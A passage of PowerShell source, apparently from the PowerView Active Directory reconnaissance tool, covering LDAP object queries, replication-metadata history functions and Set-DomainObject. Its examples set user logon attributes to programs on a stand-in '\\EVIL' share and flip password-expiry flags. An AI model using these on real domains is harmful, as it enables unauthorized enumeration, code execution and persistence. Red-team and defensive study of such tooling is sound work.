"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER SecurityMasks + +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +.PARAMETER Tombstone + +Switch. 
Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER FindOne + +Only return one result object. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Raw + +Switch. Return raw results instead of translating the fields into a custom PSObject. + +.EXAMPLE + +Get-DomainObject -Domain testlab.local + +Return all objects for the testlab.local domain + +.EXAMPLE + +'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname + +distinguishedname +----------------- +CN=PRIMARY,OU=Domain Controllers,DC=testlab,DC=local +CN=dfm,CN=Users,DC=testlab,DC=local +OU=OU3,DC=testlab,DC=local +CN=dfm (admin),CN=Users,DC=testlab,DC=local + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainObject -Credential $Cred -Identity 'windows1' + +.EXAMPLE + +Get-Domain | Select-Object -Expand name +testlab.local + +'testlab\harmj0y','DEV\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainUser] Extracted domain 'testlab.local' from 'testlab\harmj0y' +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=harmj0y))) + +distinguishedname +----------------- +CN=harmj0y,CN=Users,DC=testlab,DC=local +VERBOSE: [Get-DomainUser] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins' +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: 
(&(|(samAccountName=Domain Admins))) +CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local + +.OUTPUTS + +PowerView.ADObject + +Custom PSObject with translated AD object property fields. + +PowerView.ADObject.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.ADObject')] + [OutputType('PowerView.ADObject.Raw')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] + [String] + $SecurityMasks, + + [Switch] + $Tombstone, + + [Alias('ReturnOne')] + [Switch] + $FindOne, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + DynamicParam { + $UACValueNames = [Enum]::GetNames($UACEnum) + # add in the negations + $UACValueNames = $UACValueNames | ForEach-Object {$_; "NOT_$_"} + # create new dynamic parameter + New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array]) + } + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = 
$Domain } + if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + $ObjectSearcher = Get-DomainSearcher @SearcherArguments + } + + PROCESS { + #bind dynamic parameter to a friendly variable + if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) { + New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters + } + if ($ObjectSearcher) { + $IdentityFilter = '' + $Filter = '' + $Identity | Where-Object {$_} | ForEach-Object { + $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29') + if ($IdentityInstance -match '^S-1-') { + $IdentityFilter += "(objectsid=$IdentityInstance)" + } + elseif ($IdentityInstance -match '^(CN|OU|DC)=') { + $IdentityFilter += "(distinguishedname=$IdentityInstance)" + if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { + # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname + # and rebuild the domain searcher + $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' 
+ Write-Verbose "[Get-DomainObject] Extracted domain '$IdentityDomain' from '$IdentityInstance'" + $SearcherArguments['Domain'] = $IdentityDomain + $ObjectSearcher = Get-DomainSearcher @SearcherArguments + if (-not $ObjectSearcher) { + Write-Warning "[Get-DomainObject] Unable to retrieve domain searcher for '$IdentityDomain'" + } + } + } + elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { + $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' + $IdentityFilter += "(objectguid=$GuidByteString)" + } + elseif ($IdentityInstance.Contains('\')) { + $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical + if ($ConvertedIdentityInstance) { + $ObjectDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/')) + $ObjectName = $IdentityInstance.Split('\')[1] + $IdentityFilter += "(samAccountName=$ObjectName)" + $SearcherArguments['Domain'] = $ObjectDomain + Write-Verbose "[Get-DomainObject] Extracted domain '$ObjectDomain' from '$IdentityInstance'" + $ObjectSearcher = Get-DomainSearcher @SearcherArguments + } + } + elseif ($IdentityInstance.Contains('.')) { + $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(dnshostname=$IdentityInstance))" + } + else { + $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(displayname=$IdentityInstance))" + } + } + if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) { + $Filter += "(|$IdentityFilter)" + } + + if ($PSBoundParameters['LDAPFilter']) { + Write-Verbose "[Get-DomainObject] Using additional LDAP filter: $LDAPFilter" + $Filter += "$LDAPFilter" + } + + # build the LDAP filter for the dynamic UAC filter value + $UACFilter | Where-Object {$_} | ForEach-Object { + if ($_ -match 'NOT_.*') { + $UACField = $_.Substring(4) + $UACValue = [Int]($UACEnum::$UACField) + $Filter += 
"(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))" + } + else { + $UACValue = [Int]($UACEnum::$_) + $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)" + } + } + + if ($Filter -and $Filter -ne '') { + $ObjectSearcher.filter = "(&$Filter)" + } + Write-Verbose "[Get-DomainObject] Get-DomainObject filter string: $($ObjectSearcher.filter)" + + if ($PSBoundParameters['FindOne']) { $Results = $ObjectSearcher.FindOne() } + else { $Results = $ObjectSearcher.FindAll() } + $Results | Where-Object {$_} | ForEach-Object { + if ($PSBoundParameters['Raw']) { + # return raw result objects + $Object = $_ + $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject.Raw') + } + else { + $Object = Convert-LDAPProperty -Properties $_.Properties + $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject') + } + $Object + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainObject] Error disposing of the Results object: $_" + } + } + $ObjectSearcher.dispose() + } + } +} + + +function Get-DomainObjectAttributeHistory { +<# +.SYNOPSIS + +Returns the Active Directory attribute replication metadata for the specified +object, i.e. a parsed version of the msds-replattributemetadata attribute. +By default, replication data for every domain object is returned. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +Wraps Get-DomainObject with a specification to retrieve the property 'msds-replattributemetadata'. +This is the domain attribute replication metadata associated with the object. The results are +parsed from their XML string form and returned as a custom object. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. 
+ +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Only return replication metadata on the specified property names. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainObjectAttributeHistory -Domain testlab.local + +Return all attribute replication metadata for all objects in the testlab.local domain. + +.EXAMPLE + +'S-1-5-21-883232822-274137685-4173207997-1109','CN=dfm.a,CN=Users,DC=testlab,DC=local','da','94299db1-e3e7-48f9-845b-3bffef8bedbb' | Get-DomainObjectAttributeHistory -Properties objectClass | ft + +ObjectDN ObjectGuid AttributeNam LastOriginat Version LastOriginat + e ingChange ingDsaDN +-------- ---------- ------------ ------------ ------- ------------ +CN=dfm.a,C... a6263874-f... objectClass 2017-03-0... 1 CN=NTDS S... +CN=DA,CN=U... 77b56df4-f... objectClass 2017-04-1... 1 CN=NTDS S... +CN=harmj0y... 94299db1-e... objectClass 2017-03-0... 1 CN=NTDS S... 
+ +.EXAMPLE + +Get-DomainObjectAttributeHistory harmj0y -Properties userAccountControl + +ObjectDN : CN=harmj0y,CN=Users,DC=testlab,DC=local +ObjectGuid : 94299db1-e3e7-48f9-845b-3bffef8bedbb +AttributeName : userAccountControl +LastOriginatingChange : 2017-03-07T19:56:27Z +Version : 4 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +.OUTPUTS + +PowerView.ADObjectAttributeHistory + +Custom PSObject with translated replication metadata fields. + +.LINK + +https://blogs.technet.microsoft.com/pie/2014/08/25/metadata-1-when-did-the-delegation-change-how-to-track-security-descriptor-modifications/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.ADObjectAttributeHistory')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{ + 'Properties' = 'msds-replattributemetadata','distinguishedname' + 'Raw' = $True + } + if 
($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['FindOne']) { $SearcherArguments['FindOne'] = $FindOne } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['Properties']) { + $PropertyFilter = $PSBoundParameters['Properties'] -Join '|' + } + else { + $PropertyFilter = '' + } + } + + PROCESS { + if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity } + + Get-DomainObject @SearcherArguments | ForEach-Object { + $ObjectDN = $_.Properties['distinguishedname'][0] + ForEach($XMLNode in $_.Properties['msds-replattributemetadata']) { + $TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_ATTR_META_DATA' -ErrorAction SilentlyContinue + if ($TempObject) { + if ($TempObject.pszAttributeName -Match $PropertyFilter) { + $Output = New-Object PSObject + $Output | Add-Member NoteProperty 'ObjectDN' $ObjectDN + $Output | Add-Member NoteProperty 'AttributeName' $TempObject.pszAttributeName + $Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange + $Output | Add-Member NoteProperty 'Version' $TempObject.dwVersion + $Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN + $Output.PSObject.TypeNames.Insert(0, 
'PowerView.ADObjectAttributeHistory') + $Output + } + } + else { + Write-Verbose "[Get-DomainObjectAttributeHistory] Error retrieving 'msds-replattributemetadata' for '$ObjectDN'" + } + } + } + } +} + + +function Get-DomainObjectLinkedAttributeHistory { +<# +.SYNOPSIS + +Returns the Active Directory links attribute value replication metadata for the +specified object, i.e. a parsed version of the msds-replvaluemetadata attribute. +By default, replication data for every domain object is returned. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +Wraps Get-DomainObject with a specification to retrieve the property 'msds-replvaluemetadata'. +This is the domain linked attribute value replication metadata associated with the object. The +results are parsed from their XML string form and returned as a custom object. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Only return replication metadata on the specified property names. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. 
+ +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainObjectLinkedAttributeHistory | Group-Object ObjectDN | ft -a + +Count Name +----- ---- + 4 CN=Administrators,CN=Builtin,DC=testlab,DC=local + 4 CN=Users,CN=Builtin,DC=testlab,DC=local + 2 CN=Guests,CN=Builtin,DC=testlab,DC=local + 1 CN=IIS_IUSRS,CN=Builtin,DC=testlab,DC=local + 1 CN=Schema Admins,CN=Users,DC=testlab,DC=local + 1 CN=Enterprise Admins,CN=Users,DC=testlab,DC=local + 4 CN=Domain Admins,CN=Users,DC=testlab,DC=local + 1 CN=Group Policy Creator Owners,CN=Users,DC=testlab,DC=local + 1 CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=testlab,DC=local + 1 CN=Windows Authorization Access Group,CN=Builtin,DC=testlab,DC=local + 8 CN=Denied RODC Password Replication Group,CN=Users,DC=testlab,DC=local + 2 CN=PRIMARY,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,... + 1 CN=Domain System Volume,CN=DFSR-LocalSettings,CN=PRIMARY,OU=Domain Con... 
+ 1 CN=ServerAdmins,CN=Users,DC=testlab,DC=local + 3 CN=DomainLocalGroup,CN=Users,DC=testlab,DC=local + + +.EXAMPLE + +'S-1-5-21-883232822-274137685-4173207997-519','af94f49e-61a5-4f7d-a17c-d80fb16a5220' | Get-DomainObjectLinkedAttributeHistory + +ObjectDN : CN=Enterprise Admins,CN=Users,DC=testlab,DC=local +ObjectGuid : 94e782c1-16a1-400b-a7d0-1126038c6387 +AttributeName : member +AttributeValue : CN=Administrator,CN=Users,DC=testlab,DC=local +TimeDeleted : 2017-03-06T00:48:29Z +TimeCreated : 2017-03-06T00:48:29Z +LastOriginatingChange : 2017-03-06T00:48:29Z +Version : 1 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +ObjectDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local +ObjectGuid : af94f49e-61a5-4f7d-a17c-d80fb16a5220 +AttributeName : member +AttributeValue : CN=dfm,CN=Users,DC=testlab,DC=local +TimeDeleted : 2017-06-13T22:20:02Z +TimeCreated : 2017-06-13T22:20:02Z +LastOriginatingChange : 2017-06-13T22:20:22Z +Version : 2 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +ObjectDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local +ObjectGuid : af94f49e-61a5-4f7d-a17c-d80fb16a5220 +AttributeName : member +AttributeValue : CN=Administrator,CN=Users,DC=testlab,DC=local +TimeDeleted : 2017-03-06T00:48:29Z +TimeCreated : 2017-03-06T00:48:29Z +LastOriginatingChange : 2017-03-06T00:48:29Z +Version : 1 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +.EXAMPLE + +Get-DomainObjectLinkedAttributeHistory ServerAdmins -Domain testlab.local + +ObjectDN : CN=ServerAdmins,CN=Users,DC=testlab,DC=local +ObjectGuid : 603b46ad-555c-49b3-8745-c0718febefc2 +AttributeName : member +AttributeValue : CN=jason.a,CN=Users,DC=dev,DC=testlab,DC=local +TimeDeleted : 2017-04-10T22:17:19Z +TimeCreated : 
2017-04-10T22:17:19Z +LastOriginatingChange : 2017-04-10T22:17:19Z +Version : 1 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +.OUTPUTS + +PowerView.ADObjectLinkedAttributeHistory + +Custom PSObject with translated replication metadata fields. + +.LINK + +https://blogs.technet.microsoft.com/pie/2014/08/25/metadata-2-the-ephemeral-admin-or-how-to-track-the-group-membership/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.ADObjectLinkedAttributeHistory')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{ + 'Properties' = 'msds-replvaluemetadata','distinguishedname' + 'Raw' = $True + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { 
$SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['Properties']) { + $PropertyFilter = $PSBoundParameters['Properties'] -Join '|' + } + else { + $PropertyFilter = '' + } + } + + PROCESS { + if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity } + + Get-DomainObject @SearcherArguments | ForEach-Object { + $ObjectDN = $_.Properties['distinguishedname'][0] + ForEach($XMLNode in $_.Properties['msds-replvaluemetadata']) { + $TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_VALUE_META_DATA' -ErrorAction SilentlyContinue + if ($TempObject) { + if ($TempObject.pszAttributeName -Match $PropertyFilter) { + $Output = New-Object PSObject + $Output | Add-Member NoteProperty 'ObjectDN' $ObjectDN + $Output | Add-Member NoteProperty 'AttributeName' $TempObject.pszAttributeName + $Output | Add-Member NoteProperty 'AttributeValue' $TempObject.pszObjectDn + $Output | Add-Member NoteProperty 'TimeCreated' $TempObject.ftimeCreated + $Output | Add-Member NoteProperty 'TimeDeleted' $TempObject.ftimeDeleted + $Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange + $Output | Add-Member NoteProperty 'Version' $TempObject.dwVersion + $Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN + $Output.PSObject.TypeNames.Insert(0, 'PowerView.ADObjectLinkedAttributeHistory') + $Output + } + } + 
else { + Write-Verbose "[Get-DomainObjectLinkedAttributeHistory] Error retrieving 'msds-replvaluemetadata' for '$ObjectDN'" + } + } + } + } +} + + +function Set-DomainObject { +<# +.SYNOPSIS + +Modifies a gven property for a specified active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +Splats user/object targeting parameters to Get-DomainObject, returning the raw +searchresult object. Retrieves the raw directoryentry for the object, and sets +any values from -Set @{}, XORs any values from -XOR @{}, and clears any values +from -Clear @(). + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER Set + +Specifies values for one or more object properties (in the form of a hashtable) that will replace the current values. + +.PARAMETER XOR + +Specifies values for one or more object properties (in the form of a hashtable) that will XOR the current values. + +.PARAMETER Clear + +Specifies an array of object properties that will be cleared in the directory. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. 
+ +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: Setting mstsinitialprogram to \\EVIL\program.exe for object testuser + +.EXAMPLE + +"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Set @{'countrycode'=1234; 'mstsinitialprogram'='\\EVIL\program2.exe'} -Verbose + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: +(&(|(objectsid=S-1-5-21-890171859-3433809279-3366196753-1108))) +VERBOSE: Setting mstsinitialprogram to \\EVIL\program2.exe for object harmj0y +VERBOSE: Setting countrycode to 1234 for object harmj0y +VERBOSE: Get-DomainSearcher search string: +LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: Setting mstsinitialprogram to \\EVIL\program2.exe for object testuser +VERBOSE: Setting countrycode to 1234 for object testuser + +.EXAMPLE + +"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Clear department -Verbose + +Cleares the 'department' field for both object identities. 
+ +.EXAMPLE + +Get-DomainUser testuser | ConvertFrom-UACValue -Verbose + +Name Value +---- ----- +NORMAL_ACCOUNT 512 + + +Set-DomainObject -Identity testuser -XOR @{useraccountcontrol=65536} -Verbose + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: XORing 'useraccountcontrol' with '65536' for object 'testuser' + +Get-DomainUser testuser | ConvertFrom-UACValue -Verbose + +Name Value +---- ----- +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +.EXAMPLE + +Get-DomainUser -Identity testuser -Properties scriptpath + +scriptpath +---------- +\\primary\sysvol\blah.ps1 + +$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Set-DomainObject -Identity testuser -Set @{'scriptpath'='\\EVIL\program2.exe'} -Credential $Cred -Verbose +VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain +VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection 